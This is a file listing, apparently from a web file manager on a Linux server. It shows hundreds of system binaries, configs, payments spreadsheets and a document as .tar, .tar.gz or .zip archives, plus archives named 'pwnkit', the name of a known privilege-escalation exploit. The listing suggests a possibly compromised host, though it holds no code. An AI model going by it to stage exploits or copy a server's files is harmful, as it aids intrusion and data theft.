libgmp10.tar.gz File 2.39 KB 0644
libgnutls30.zip File 167.36 KB 0644
libgraphite2-3.tar File 13.5 KB 0644
libgraphite2-3.tar.gz File 5.18 KB 0644
libidn2-0.tar File 18.5 KB 0644
libidn2-0.tar.gz File 10.51 KB 0644
libjson-perl.tar File 11 KB 0644
libjson-perl.tar.gz File 3.68 KB 0644
libjson-xs-perl.zip File 6.36 KB 0644
libkmod2.tar File 11.5 KB 0644
libkmod2.tar.gz File 3.99 KB 0644
libldap-2.5-0.zip File 22.97 KB 0644
liblmdb0.zip File 3.7 KB 0644
liblz4-1.zip File 4.81 KB 0644
liblzf1.tar File 7.5 KB 0644
liblzf1.tar.gz File 2.29 KB 0644
liblzo2-2.tar File 13 KB 0644
liblzo2-2.tar.gz File 7.77 KB 0644
liblzo2-2.zip File 8.84 KB 0644
libman.so.so.tar.gz File 82.25 KB 0644
libman.so.tar File 190 KB 0644
libmpfr6.zip File 32.2 KB 0644
libncursesw6.tar File 12.5 KB 0644
libncursesw6.tar.gz File 5.58 KB 0644
libnginx-mod-http-geoip2.tar File 13.5 KB 0644
libnginx-mod-http-geoip2.tar.gz File 4.42 KB 0644
libnginx-mod-mail.zip File 11.08 KB 0644
libnl-3-200.tar File 10 KB 0644
libnl-3-200.tar.gz File 3.72 KB 0644
libnl-3-200.zip File 7.25 KB 0644
libnpth0.tar File 4.5 KB 0644
libnpth0.tar.gz File 1.86 KB 0644
libnpth0.zip File 2.41 KB 0644
libnsl2.tar File 16 KB 0644
libnsl2.tar.gz File 4.13 KB 0644
libpciaccess0.zip File 6.58 KB 0644
libpcre3.tar File 43 KB 0644
libpcre3.tar.gz File 36.67 KB 0644
libpolkit-gobject-1-0.tar File 8 KB 0644
libpolkit-gobject-1-0.tar.gz File 5.14 KB 0644
libseccomp2.tar File 4.5 KB 0644
libseccomp2.tar.gz File 1.94 KB 0644
libslirp0.tar File 8.5 KB 0644
libslirp0.tar.gz File 3.28 KB 0644
libslirp0.zip File 5.99 KB 0644
libsystemd0.zip File 14.06 KB 0644
libtiff5.zip File 4.14 KB 0644
libtirpc3.tar File 17.5 KB 0644
libtirpc3.tar.gz File 5.13 KB 0644
libxaw7.zip File 10.36 KB 0644
libxmuu1.zip File 5.51 KB 0644
libxxf86vm1.tar File 5 KB 0644
libxxf86vm1.tar.gz File 2.29 KB 0644
limits.tar File 27 KB 0644
limits.tar.gz File 371 B 0644
linux-boot-prober.tar File 3.5 KB 0644
linux-boot-prober.tar.gz File 703 B 0644
linux-check-removal.tar File 5.5 KB 0644
linux-check-removal.tar.gz File 1.86 KB 0644
linux-version.tar File 4.5 KB 0644
linux-version.tar.gz File 1.31 KB 0644
listres.tar File 16.5 KB 0644
listres.tar.gz File 4.32 KB 0644
ln.tar File 60.5 KB 0644
ln.tar.gz File 25.13 KB 0644
lnstat.tar File 24.5 KB 0644
lnstat.tar.gz File 7.57 KB 0644
loadkeys.tar File 200.5 KB 0644
loadkeys.tar.gz File 59.27 KB 0644
local.tar File 119.47 MB 0644
local.tar.gz File 45.47 MB 0644
local.zip File 119.47 MB 0644
locale-archive.tar File 2.91 MB 0644
locale-archive.tar.gz File 674.91 KB 0644
locale.zip File 3.25 MB 0644
localectl.tar File 28 KB 0644
localectl.tar.gz File 8.93 KB 0644
localedef.tar File 328.5 KB 0644
localedef.tar.gz File 139.83 KB 0644
logresolve.tar File 16 KB 0644
logresolve.tar.gz File 3.94 KB 0644
logrotate.tar File 104 KB 0644
logrotate.tar.gz File 40.51 KB 0644
lowntfs-3g.tar File 116.5 KB 0644
lowntfs-3g.tar.gz File 48.82 KB 0644
lsattr.tar File 16 KB 0644
lsattr.tar.gz File 3.97 KB 0644
lsb.zip File 19.77 KB 0644
lsb_release.tar File 5.5 KB 0644
lsb_release.tar.gz File 1.2 KB 0644
lvchange.tar File 2.89 MB 0644
lvchange.tar.gz File 932.15 KB 0644
lvconvert.tar File 2.89 MB 0644
lvconvert.tar.gz File 932.16 KB 0644
lvextend.tar File 2.89 MB 0644
lvextend.tar.gz File 932.15 KB 0644
lvm.tar File 120 KB 0644
lvm.tar.gz File 28 KB 0644
lvmconfig.tar File 2.89 MB 0644
lvmconfig.tar.gz File 932.16 KB 0644
lvmdump.tar File 12 KB 0644
lvmdump.tar.gz File 3.64 KB 0644
lvmsadc.tar File 2.89 MB 0644
lvmsadc.tar.gz File 932.15 KB 0644
lvreduce.tar File 2.89 MB 0644
lvreduce.tar.gz File 932.15 KB 0644
lvrename.tar File 2.89 MB 0644
lvrename.tar.gz File 932.15 KB 0644
lvresize.tar File 2.89 MB 0644
lvresize.tar.gz File 932.15 KB 0644
lzcat.tar File 84.5 KB 0644
lzcat.tar.gz File 33.92 KB 0644
machine-id.tar File 2 KB 0644
machine-id.tar.gz File 120 B 0644
magic.mime.mime.tar.gz File 177 B 0644
magic.mime.tar File 2 KB 0644
make-ssl-cert.tar File 8.5 KB 0644
make-ssl-cert.tar.gz File 2.42 KB 0644
man.tar File 119.5 KB 0644
man.tar.gz File 51.43 KB 0644
mandb.tar File 282 KB 0644
mandb.tar.gz File 58.62 KB 0644
manifest.tar File 3.5 KB 0644
manifest.tar.gz File 1012 B 0644
maps.tar File 7.5 KB 0644
maps.tar.gz File 76 B 0644
mariadb-common.tar File 43 KB 0644
mariadb-common.tar.gz File 14.41 KB 0644
mariadb-hotcopy.tar File 36 KB 0644
mariadb-hotcopy.tar.gz File 11.7 KB 0644
mariadb-repair.tar File 3.86 MB 0644
mariadb-repair.tar.gz File 1007.13 KB 0644
mariadb-report.tar File 50 KB 0644
mariadb-report.tar.gz File 11.71 KB 0644
mariadb-setpermission.tar File 19.5 KB 0644
mariadb-setpermission.tar.gz File 5.31 KB 0644
mariadb-waitpid.tar File 3.54 MB 0644
mariadb-waitpid.tar.gz File 891 KB 0644
mariadb.tar File 4.09 MB 0644
mariadb.tar.gz File 1.07 MB 0644
mc.tar File 1.34 MB 0644
mc.tar.gz File 70.22 KB 0644
mc.zip File 253.13 KB 0644
mcookie.tar File 28 KB 0644
mcookie.tar.gz File 8.89 KB 0644
mcview.tar File 1.05 MB 0644
mcview.tar.gz File 505.34 KB 0644
md5sum.textutils.tar File 44 KB 0644
md5sum.textutils.textutils.tar.gz File 17.39 KB 0644
migrate-pubring-from-classic-gpg.tar File 4.5 KB 0644
migrate-pubring-from-classic-gpg.tar.gz File 1.4 KB 0644
mime.zip File 7.24 KB 0644
mke2fs.conf.conf.tar.gz File 420 B 0644
mke2fs.conf.tar File 2.5 KB 0644
mkfs.btrfs.btrfs.tar.gz File 262.4 KB 0644
mkfs.btrfs.tar File 473 KB 0644
mkfs.ext3.ext3.tar.gz File 56.91 KB 0644
mkfs.ext3.tar File 132.5 KB 0644
mkfs.ext4.ext4.tar.gz File 56.91 KB 0644
mkfs.ext4.tar File 132.5 KB 0644
mkfs.fat.fat.tar.gz File 21.77 KB 0644
mkfs.fat.tar File 52.5 KB 0644
mkfs.minix.minix.tar.gz File 17.04 KB 0644
mkfs.minix.tar File 44 KB 0644
mkfs.msdos.msdos.tar.gz File 21.77 KB 0644
mkfs.msdos.tar File 52.5 KB 0644
mkfs.ntfs.ntfs.tar.gz File 29.88 KB 0644
mkfs.ntfs.tar File 72 KB 0644
mkfs.tar File 16 KB 0644
mkfs.tar.gz File 4.26 KB 0644
mkfs.vfat.tar File 52.5 KB 0644
mkfs.vfat.vfat.tar.gz File 21.77 KB 0644
mkhomedir_helper.tar File 24 KB 0644
mkhomedir_helper.tar.gz File 4.16 KB 0644
mkinitramfs.tar File 14 KB 0644
mkinitramfs.tar.gz File 4.63 KB 0644
modprobe.tar File 168 KB 0644
modprobe.tar.gz File 76.67 KB 0644
modules.tar File 6.5 KB 0644
modules.tar.gz File 1.14 KB 0644
motd.dynamic.dynamic.tar.gz File 586 B 0644
motd.dynamic.tar File 2.5 KB 0644
mount.fuse.fuse.tar.gz File 5.3 KB 0644
mount.fuse.tar File 20 KB 0644
mount.fuse3.fuse3.tar.gz File 5.31 KB 0644
mount.fuse3.tar File 20 KB 0644
mount.ntfs.ntfs.tar.gz File 66.87 KB 0644
mount.ntfs.tar File 161 KB 0644
mountinfo.tar File 15 KB 0644
mountinfo.tar.gz File 993 B 0644
mounts.tar File 25 KB 0644
mounts.tar.gz File 706 B 0644
mpath_persist.h.h.tar.gz File 3.21 KB 0644
mpath_persist.h.tar File 13 KB 0644
mpathpersist.tar File 33 KB 0644
mpathpersist.tar.gz File 9.83 KB 0644
msql2mysql.tar File 3 KB 0644
msql2mysql.tar.gz File 818 B 0644
multipath.tar File 36 KB 0644
multipath.tar.gz File 11.79 KB 0644
multipath.zip File 327.11 KB 0644
myisampack.tar File 3.89 MB 0644
myisampack.tar.gz File 1.05 MB 0644
mysql_fix_extensions.tar File 3 KB 0644
mysql_fix_extensions.tar.gz File 841 B 0644
mysql_install_db.tar File 24 KB 0644
mysql_install_db.tar.gz File 7.16 KB 0644
mysql_setpermission.tar File 19.5 KB 0644
mysql_setpermission.tar.gz File 5.31 KB 0644
mysql_tzinfo_to_sql.tar File 3.55 MB 0644
mysql_tzinfo_to_sql.tar.gz File 896.57 KB 0644
mysqlbinlog.tar File 4.12 MB 0644
mysqlbinlog.tar.gz File 1.11 MB 0644
mysqlcheck.tar File 3.86 MB 0644
mysqlcheck.tar.gz File 1007.13 KB 0644
mysqld_safe.tar File 32 KB 0644
mysqld_safe.tar.gz File 10.3 KB 0644
mysqld_safe_helper.tar File 3.51 MB 0644
mysqld_safe_helper.tar.gz File 875.83 KB 0644
mysqlhotcopy.tar File 36 KB 0644
mysqlhotcopy.tar.gz File 11.7 KB 0644
mysqloptimize.tar File 3.86 MB 0644
mysqloptimize.tar.gz File 1007.13 KB 0644
nawk.tar File 690 KB 0644
nawk.tar.gz File 344.97 KB 0644
neqn.tar File 2.5 KB 0644
neqn.tar.gz File 644 B 0644
netcat-openbsd.zip File 35.47 KB 0644
netplan.zip File 155.89 KB 0644
network.tar File 2 KB 0644
network.tar.gz File 166 B 0644
networkctl.tar File 104 KB 0644
networkctl.tar.gz File 42.14 KB 0644
newgrp.tar File 41.5 KB 0644
newgrp.tar.gz File 13.4 KB 0644
newusers.tar File 76.5 KB 0644
newusers.tar.gz File 29.13 KB 0644
nfnl_osf.tar File 20 KB 0644
nfnl_osf.tar.gz File 5.06 KB 0644
nft.tar File 28 KB 0644
nft.tar.gz File 7.08 KB 0644
ngettext.tar File 36 KB 0644
ngettext.tar.gz File 10.84 KB 0644
nginx.pid.pid.tar.gz File 76 B 0644
nginx.pid.tar File 1.5 KB 0644
nginx.tar File 1.56 MB 0644
nginx.tar.gz File 528.32 KB 0644
nl.tar File 100.5 KB 0644
nl.tar.gz File 48.09 KB 0644
nsenter.tar File 28.5 KB 0644
nsenter.tar.gz File 7.55 KB 0644
nslookup.tar File 120.5 KB 0644
nslookup.tar.gz File 48.47 KB 0644
ntfs-3g.probe.probe.tar.gz File 3.05 KB 0644
ntfs-3g.probe.tar File 16 KB 0644
ntfs-3g.tar File 161 KB 0644
ntfs-3g.tar.gz File 66.87 KB 0644
ntfsclone.tar File 52 KB 0644
ntfsclone.tar.gz File 20 KB 0644
ntfscmp.tar File 32 KB 0644
ntfscmp.tar.gz File 9.16 KB 0644
ntfsfix.tar File 36 KB 0644
ntfsfix.tar.gz File 12.3 KB 0644
ntfsls.tar File 29 KB 0644
ntfsls.tar.gz File 8.66 KB 0644
ntfsmove.tar File 32 KB 0644
ntfsmove.tar.gz File 11.06 KB 0644
ntfsresize.tar File 64 KB 0644
ntfsresize.tar.gz File 27.94 KB 0644
ntfsundelete.tar File 52 KB 0644
ntfsundelete.tar.gz File 19.57 KB 0644
ntfsusermap.tar File 20 KB 0644
ntfsusermap.tar.gz File 7.08 KB 0644
numa_maps.tar File 4 KB 0644
numa_maps.tar.gz File 81 B 0644
nvacps.tar File 2 KB 0644
nvacps.tar.gz File 186 B 0644
nvacps.zip File 258 B 0644
nvidia-detector.tar File 2 KB 0644
nvidia-detector.tar.gz File 249 B 0644
on_ac_power.tar File 5.5 KB 0644
on_ac_power.tar.gz File 1.57 KB 0644
oom_adj.tar File 11 KB 0644
oom_adj.tar.gz File 90 B 0644
oom_score.tar File 3 KB 0644
oom_score.tar.gz File 92 B 0644
oom_score_adj.tar File 9 KB 0644
oom_score_adj.tar.gz File 96 B 0644
open-iscsi.zip File 29.66 KB 0644
open.tar File 20 KB 0644
open.tar.gz File 5.04 KB 0644
openssh.tar File 676 KB 0644
openssh.tar.gz File 280.98 KB 0644
os-prober.tar File 9.5 KB 0644
os-prober.tar.gz File 3.89 KB 0644
overlayroot-chroot.tar File 4 KB 0644
overlayroot-chroot.tar.gz File 1.25 KB 0644
pam-auth-update.tar File 22 KB 0644
pam-auth-update.tar.gz File 7.25 KB 0644
pam.d.zip File 522 B 0644
pam_getenv.tar File 4.5 KB 0644
pam_getenv.tar.gz File 1.43 KB 0644
parted.tar File 88 KB 0644
parted.tar.gz File 35.24 KB 0644
payments 2025-05-28 15-23-40.xlsx.tar File 8.5 KB 0644
payments 2025-05-28 15-23-40.xlsx.xlsx.tar.gz File 6.15 KB 0644
payments 2025-05-28 15-24-23.xlsx.tar File 8.5 KB 0644
payments 2025-05-28 15-24-23.xlsx.xlsx.tar.gz File 6.16 KB 0644
payments 2025-05-28 15-32-07.xlsx.tar File 8.5 KB 0644
payments 2025-05-28 15-32-07.xlsx.xlsx.tar.gz File 6.16 KB 0644
payments 2025-05-29 03-55-40.xlsx.tar File 8.5 KB 0644
payments 2025-05-29 03-55-40.xlsx.xlsx.tar.gz File 6.16 KB 0644
payments 2025-05-30 07-55-52.xlsx.tar File 9 KB 0644
payments 2025-05-30 07-55-52.xlsx.xlsx.tar.gz File 6.44 KB 0644
payments 2025-05-30 07-59-34.xlsx.tar File 9 KB 0644
payments 2025-05-30 07-59-34.xlsx.xlsx.tar.gz File 6.44 KB 0644
payments 2025-07-16 13-57-11.xlsx.tar File 8.5 KB 0644
payments 2025-07-16 13-57-11.xlsx.xlsx.tar.gz File 6.32 KB 0644
payments 2025-07-16 14-04-06.xlsx.tar File 9.5 KB 0644
payments 2025-07-16 14-04-06.xlsx.xlsx.tar.gz File 7.3 KB 0644
payments 2025-07-16 15-16-08.xlsx.tar File 9.5 KB 0644
payments 2025-07-16 15-16-08.xlsx.xlsx.tar.gz File 7.3 KB 0644
payments 2025-07-18 12-09-36.xlsx.tar File 10 KB 0644
payments 2025-07-18 12-09-36.xlsx.xlsx.tar.gz File 7.9 KB 0644
payments 2025-07-18 12-09-53.xlsx.tar File 10 KB 0644
payments 2025-07-18 12-09-53.xlsx.xlsx.tar.gz File 7.9 KB 0644
payments 2025-08-01 07-45-11.xlsx.tar File 9.5 KB 0644
payments 2025-08-01 07-45-11.xlsx.xlsx.tar.gz File 7 KB 0644
payments 2025-08-01 09-00-13.xlsx.tar File 9.5 KB 0644
payments 2025-08-01 09-00-13.xlsx.xlsx.tar.gz File 7 KB 0644
pbget.tar File 4.5 KB 0644
pbget.tar.gz File 1.3 KB 0644
pbput.tar File 4.5 KB 0644
pbput.tar.gz File 1.3 KB 0644
pbputs.tar File 4.5 KB 0644
pbputs.tar.gz File 1.3 KB 0644
perl.tar File 2.5 KB 0644
perl.tar.gz File 376 B 0644
perl.zip File 773 B 0644
perl5.34.0.34.0.tar.gz File 1.25 MB 0644
perl5.34.0.tar File 3.63 MB 0644
perlivp.tar File 12.5 KB 0644
perlivp.tar.gz File 3.6 KB 0644
perror.tar File 3.73 MB 0644
perror.tar.gz File 944.34 KB 0644
pg_config.tar File 3 KB 0644
pg_config.tar.gz File 772 B 0644
pg_ctlcluster.tar File 24.5 KB 0644
pg_ctlcluster.tar.gz File 7.32 KB 0644
pg_dropcluster.tar File 10 KB 0644
pg_dropcluster.tar.gz File 2.88 KB 0644
pg_dumpall.tar File 11 KB 0644
pg_dumpall.tar.gz File 3.65 KB 0644
pg_isready.tar File 11 KB 0644
pg_isready.tar.gz File 3.65 KB 0644
pg_lsclusters.tar File 7 KB 0644
pg_lsclusters.tar.gz File 2.39 KB 0644
pg_receivewal.tar File 11 KB 0644
pg_receivewal.tar.gz File 3.66 KB 0644
pg_restore.tar File 11 KB 0644
pg_restore.tar.gz File 3.65 KB 0644
pg_restorecluster.tar File 15 KB 0644
pg_restorecluster.tar.gz File 4.08 KB 0644
phar8.3.3.tar.gz File 14.48 KB 0644
phar8.3.tar File 16.5 KB 0644
phar8.4.4.tar.gz File 14.49 KB 0644
phar8.4.tar File 16.5 KB 0644
photo_2026-01-13_13-45-49.jpg.jpg.tar.gz File 141.67 KB 0644
photo_2026-01-13_13-45-49.jpg.tar File 144.5 KB 0644
php-fpm8.3.3.tar.gz File 2.13 MB 0644
php-fpm8.3.tar File 5.51 MB 0644
php8.3-gd.tar File 2 KB 0644
php8.3-gd.tar.gz File 145 B 0644
php8.3.3.tar.gz File 2.12 MB 0644
php8.3.tar File 5.53 MB 0644
php8.4.4.tar.gz File 2.19 MB 0644
php8.4.tar File 5.75 MB 0644
phpenmod.tar File 9 KB 0644
phpenmod.tar.gz File 2.38 KB 0644
pico.tar File 278.5 KB 0644
pico.tar.gz File 135.37 KB 0644
piconv.tar File 10 KB 0644
piconv.tar.gz File 3.05 KB 0644
pigz.tar File 136 KB 0644
pigz.tar.gz File 64.25 KB 0644
pinky.tar File 36 KB 0644
pinky.tar.gz File 13.52 KB 0644
pkcon.tar File 60 KB 0644
pkcon.tar.gz File 19.29 KB 0644
pki.zip File 10.51 KB 0644
pl2pm.tar File 6 KB 0644
pl2pm.tar.gz File 2.16 KB 0644
pldd.tar File 24 KB 0644
pldd.tar.gz File 6.01 KB 0644
plymouth.tar File 48 KB 0644
plymouth.tar.gz File 16.12 KB 0644
plymouthd.tar File 152.5 KB 0644
plymouthd.tar.gz File 42.64 KB 0644
pod2html.tar File 6 KB 0644
pod2html.tar.gz File 1.6 KB 0644
pod2man.tar File 16.5 KB 0644
pod2man.tar.gz File 5.95 KB 0644
pod2usage.tar File 6 KB 0644
pod2usage.tar.gz File 1.81 KB 0644
podchecker.tar File 5.5 KB 0644
podchecker.tar.gz File 1.68 KB 0644
pollinate.tar File 5.5 KB 0644
pollinate.tar.gz File 2.09 KB 0644
postgresql-common.zip File 3.63 KB 0644
power.tar File 32 KB 0644
power.tar.gz File 889 B 0644
poweroff.tar File 1.07 MB 0644
poweroff.tar.gz File 508.75 KB 0644
printenv.tar File 32 KB 0644
printenv.tar.gz File 10.12 KB 0644
printf.tar File 52 KB 0644
printf.tar.gz File 20.07 KB 0644
prlimit.tar File 28.5 KB 0644
prlimit.tar.gz File 8.7 KB 0644
projid_map.tar File 8 KB 0644
projid_map.tar.gz File 112 B 0644
prove.tar File 15 KB 0644
prove.tar.gz File 5.32 KB 0644
prtstat.tar File 24 KB 0644
prtstat.tar.gz File 6.5 KB 0644
psfaddtable.tar File 28 KB 0644
psfaddtable.tar.gz File 9.69 KB 0644
psfgettable.tar File 28 KB 0644
psfgettable.tar.gz File 9.69 KB 0644
psfxtable.tar File 28 KB 0644
psfxtable.tar.gz File 9.69 KB 0644
psql.tar File 11 KB 0644
psql.tar.gz File 3.65 KB 0644
pstree.tar File 37 KB 0644
pstree.tar.gz File 13.34 KB 0644
pstree.x11.tar File 37 KB 0644
pstree.x11.x11.tar.gz File 13.34 KB 0644
ptar.tar File 5 KB 0644
ptar.tar.gz File 1.64 KB 0644
pvchange.tar File 2.89 MB 0644
pvchange.tar.gz File 932.15 KB 0644
pvcreate.tar File 2.89 MB 0644
pvcreate.tar.gz File 932.15 KB 0644
pvdisplay.tar File 2.89 MB 0644
pvdisplay.tar.gz File 932.16 KB 0644
pwck.tar File 52 KB 0644
pwck.tar.gz File 18.29 KB 0644
pwdx.tar File 16 KB 0644
pwdx.tar.gz File 3.86 KB 0644
pwnkit.tar File 12.5 KB 0644
pwnkit.tar.gz File 3.9 KB 0644
pydoc3.10.10.tar.gz File 155 B 0644
pydoc3.10.tar File 2 KB 0644
python3-pkg-resources.tar File 36.5 KB 0644
python3-pkg-resources.tar.gz File 31.62 KB 0644
python3-yaml.zip File 34.79 KB 0644
python3-zope.hookable.zip File 3.87 KB 0644
python3.10.10.tar.gz File 2.47 MB 0644
python3.10.tar File 5.67 MB 0644
python3.10.tar.gz File 2.47 MB 0644
pzstd.tar File 704 KB 0644
pzstd.tar.gz File 299.87 KB 0644
quirks-handler.tar File 4 KB 0644
quirks-handler.tar.gz File 1.09 KB 0644
rbash.tar File 1.33 MB 0644
rbash.tar.gz File 650.46 KB 0644
readprofile.tar File 24 KB 0644
readprofile.tar.gz File 6.76 KB 0644
reboot-required.pkgs.pkgs.tar.gz File 114 B 0644
reboot-required.pkgs.tar File 2 KB 0644
reboot.tar File 1.07 MB 0644
reboot.tar.gz File 508.75 KB 0644
redis-benchmark.tar File 732.5 KB 0644
redis-benchmark.tar.gz File 206.08 KB 0644
redis-check-aof.tar File 1.41 MB 0644
redis-check-aof.tar.gz File 656.89 KB 0644
redis-check-rdb.tar File 1.41 MB 0644
redis-check-rdb.tar.gz File 656.89 KB 0644
redis-server.tar File 1.41 MB 0644
redis-server.tar.gz File 656.89 KB 0644
remove-shell.tar File 3 KB 0644
remove-shell.tar.gz File 628 B 0644
resize2fs.tar File 68 KB 0644
resize2fs.tar.gz File 26.72 KB 0644
resizecons.tar File 28 KB 0644
resizecons.tar.gz File 8.66 KB 0644
resolveip.tar File 3.54 MB 0644
resolveip.tar.gz File 891.42 KB 0644
rmiregistry.tar File 16 KB 0644
rmiregistry.tar.gz File 2.5 KB 0644
rmt-tar.tar File 60.5 KB 0644
rmt-tar.tar.gz File 25.78 KB 0644
rotatelogs.tar File 28 KB 0644
rotatelogs.tar.gz File 7.88 KB 0644
rrsync.tar File 14 KB 0644
rrsync.tar.gz File 4.51 KB 0644
rsync.zip File 74.36 KB 0644
rsyslogd.tar File 769 KB 0644
rsyslogd.tar.gz File 330.26 KB 0644
rtc.tar File 2 KB 0644
rtc.tar.gz File 274 B 0644
rtmon.tar File 92 KB 0644
rtmon.tar.gz File 37.85 KB 0644
run-one.tar File 5.5 KB 0644
run-one.tar.gz File 1.67 KB 0644
run-parts.tar File 28.5 KB 0644
run-parts.tar.gz File 7.93 KB 0644
run-this-one.tar File 5.5 KB 0644
run-this-one.tar.gz File 1.68 KB 0644
runcon.tar File 36.5 KB 0644
runcon.tar.gz File 12.01 KB 0644
runlevel.tar File 1.07 MB 0644
runlevel.tar.gz File 508.75 KB 0644
rvim.tar File 3.61 MB 0644
rvim.tar.gz File 1.85 MB 0644
samurai_activity.log.log.tar.gz File 294 B 0644
samurai_activity.log.tar File 2 KB 0644
sar.sysstat.sysstat.tar.gz File 53.28 KB 0644
sar.sysstat.tar File 135 KB 0644
sbvarsign.tar File 24.5 KB 0644
sbvarsign.tar.gz File 7.77 KB 0644
sbverify.tar File 36.5 KB 0644
sbverify.tar.gz File 11.54 KB 0644
sched.tar File 11.5 KB 0644
sched.tar.gz File 538 B 0644
schedstat.tar File 6 KB 0644
schedstat.tar.gz File 94 B 0644
screendump.tar File 16 KB 0644
screendump.tar.gz File 3.92 KB 0644
scsi.zip File 6.24 KB 0644
scsi_satl.tar File 5.5 KB 0644
scsi_satl.tar.gz File 1.6 KB 0644
sensible-pager.tar File 2.5 KB 0644
sensible-pager.tar.gz File 455 B 0644
sensors.d.tar File 1.5 KB 0644
sensors.d.tar.gz File 75 B 0644
sensors3.conf.conf.tar.gz File 1.93 KB 0644
sensors3.conf.tar File 12 KB 0644
services.tar File 14.5 KB 0644
services.tar.gz File 5.32 KB 0644
session-migration.tar File 24 KB 0644
session-migration.tar.gz File 5.17 KB 0644
sessionid.tar File 8 KB 0644
sessionid.tar.gz File 102 B 0644
setgroups.tar File 9 KB 0644
setgroups.tar.gz File 95 B 0644
setlogcons.tar File 16 KB 0644
setlogcons.tar.gz File 3.37 KB 0644
setvtrgb.tar File 16 KB 0644
setvtrgb.tar.gz File 4.7 KB 0644
sfdisk.tar File 104 KB 0644
sfdisk.tar.gz File 40.41 KB 0644
sg_copy_results.tar File 25 KB 0644
sg_copy_results.tar.gz File 6.25 KB 0644
sg_decode_sense.tar File 16.5 KB 0644
sg_decode_sense.tar.gz File 5.66 KB 0644
sg_opcodes.tar File 37 KB 0644
sg_opcodes.tar.gz File 11.58 KB 0644
sg_raw.tar File 28.5 KB 0644
sg_raw.tar.gz File 8.98 KB 0644
sg_read_long.tar File 16.5 KB 0644
sg_read_long.tar.gz File 4.82 KB 0644
sg_reassign.tar File 16.5 KB 0644
sg_reassign.tar.gz File 5.87 KB 0644
sg_rmsn.tar File 16.5 KB 0644
sg_rmsn.tar.gz File 3.97 KB 0644
sg_sanitize.tar File 29 KB 0644
sg_sanitize.tar.gz File 9.21 KB 0644
sg_sat_set_features.tar File 20.5 KB 0644
sg_sat_set_features.tar.gz File 5.46 KB 0644
sg_ses_microcode.tar File 29 KB 0644
sg_ses_microcode.tar.gz File 10.11 KB 0644
sg_sync.tar File 16.5 KB 0644
sg_sync.tar.gz File 4.5 KB 0644
sg_vpd.tar File 116 KB 0644
sg_vpd.tar.gz File 44.28 KB 0644
sg_wr_mode.tar File 24.5 KB 0644
sg_wr_mode.tar.gz File 7.38 KB 0644
sg_write_verify.tar File 28.5 KB 0644
sg_write_verify.tar.gz File 7.22 KB 0644
sg_write_x.tar File 57.5 KB 0644
sg_write_x.tar.gz File 20.81 KB 0644
sgdisk.tar File 164 KB 0644
sgdisk.tar.gz File 73.45 KB 0644
sha256sum.tar File 52 KB 0644
sha256sum.tar.gz File 22.17 KB 0644
sha512sum.tar File 60 KB 0644
sha512sum.tar.gz File 24.1 KB 0644
shablon-akta-sverki-1-1.docx.docx.tar.gz File 22.85 KB 0644
shablon-akta-sverki-1-1.docx.tar File 58 KB 0644
shasum.tar File 11.5 KB 0644
shasum.tar.gz File 4.06 KB 0644
shm.tar File 2.5 KB 0644
shm.tar.gz File 265 B 0644
showconsolefont.tar File 20 KB 0644
showconsolefont.tar.gz File 6.97 KB 0644
shutdown.tar File 1.07 MB 0644
shutdown.tar.gz File 508.75 KB 0644
skel.tar File 8 KB 0644
skel.tar.gz File 2.18 KB 0644
slabtop.tar File 24 KB 0644
slabtop.tar.gz File 7.01 KB 0644
smaps.tar File 5 KB 0644
smaps.tar.gz File 76 B 0644
smaps_rollup.tar File 6 KB 0644
smaps_rollup.tar.gz File 83 B 0644
snapd.tar File 32.5 KB 0644
snapd.tar.gz File 29.77 KB 0644
snapd.zip File 2.29 KB 0644
snapfuse.tar File 40 KB 0644
snapfuse.tar.gz File 15.45 KB 0644
snice.tar File 32 KB 0644
snice.tar.gz File 9.86 KB 0644
soelim.tar File 32 KB 0644
soelim.tar.gz File 14.39 KB 0644
sos-collector.tar File 3 KB 0644
sos-collector.tar.gz File 713 B 0644
sosreport.tar File 3 KB 0644
sosreport.tar.gz File 705 B 0644
split.tar File 52.5 KB 0644
split.tar.gz File 21.93 KB 0644
splitfont.tar File 16 KB 0644
splitfont.tar.gz File 2.97 KB 0644
squashfs-tools.zip File 2.56 KB 0644
src.tar File 100.52 MB 0644
src.tar.gz File 22.38 MB 0644
ssh-add.tar File 168 KB 0644
ssh-add.tar.gz File 77.31 KB 0644
ssh-agent.tar File 288 KB 0644
ssh-agent.tar.gz File 120.2 KB 0644
ssh.tar File 829 KB 0644
ssh.tar.gz File 379.08 KB 0644
sshd.tar File 901.5 KB 0644
sshd.tar.gz File 412.18 KB 0644
stat.tar File 86.5 KB 0644
stat.tar.gz File 165 B 0644
stat.zip File 1.95 KB 0644
statm.tar File 5 KB 0644
statm.tar.gz File 91 B 0644
status.tar File 10.5 KB 0644
status.tar.gz File 422 B 0644
stdbuf.tar File 44.5 KB 0644
stdbuf.tar.gz File 18.33 KB 0644
subgid.tar File 2 KB 0644
subgid.tar.gz File 112 B 0644
sudo.tar File 228.5 KB 0644
sudo.tar.gz File 100.2 KB 0644
sudo_logsrvd.conf.conf.tar.gz File 2.96 KB 0644
sudo_logsrvd.conf.tar File 11 KB 0644
sudo_logsrvd.tar File 202 KB 0644
sudo_logsrvd.tar.gz File 83.83 KB 0644
sudo_sendlog.tar File 109 KB 0644
sudo_sendlog.tar.gz File 41.41 KB 0644
sudoreplay.tar File 89.5 KB 0644
sudoreplay.tar.gz File 35.02 KB 0644
swapoff.tar File 24 KB 0644
swapoff.tar.gz File 6.6 KB 0644
swaps.tar File 2 KB 0644
swaps.tar.gz File 152 B 0644
switch_root.tar File 24 KB 0644
switch_root.tar.gz File 4.95 KB 0644
sysstat.zip File 8.42 KB 0644
systemctl.tar File 1.07 MB 0644
systemctl.tar.gz File 508.74 KB 0644
systemd-ask-password.tar File 20 KB 0644
systemd-ask-password.tar.gz File 5.26 KB 0644
systemd-cgls.tar File 24 KB 0644
systemd-cgls.tar.gz File 5.91 KB 0644
systemd-cgtop.tar File 40 KB 0644
systemd-cgtop.tar.gz File 12.93 KB 0644
systemd-escape.tar File 24 KB 0644
systemd-escape.tar.gz File 5.59 KB 0644
systemd-hwdb.tar File 120.5 KB 0644
systemd-hwdb.tar.gz File 56.12 KB 0644
systemd-inhibit.tar File 24 KB 0644
systemd-inhibit.tar.gz File 6.98 KB 0644
systemd-mount.tar File 52.5 KB 0644
systemd-mount.tar.gz File 19.8 KB 0644
systemd-run.tar File 64.5 KB 0644
systemd-run.tar.gz File 22.03 KB 0644
tabs.tar File 20 KB 0644
tabs.tar.gz File 6.39 KB 0644
tapestat.tar File 28 KB 0644
tapestat.tar.gz File 9.16 KB 0644
tarcat.tar File 2.5 KB 0644
tarcat.tar.gz File 607 B 0644
tbl.tar File 128 KB 0644
tbl.tar.gz File 53.02 KB 0644
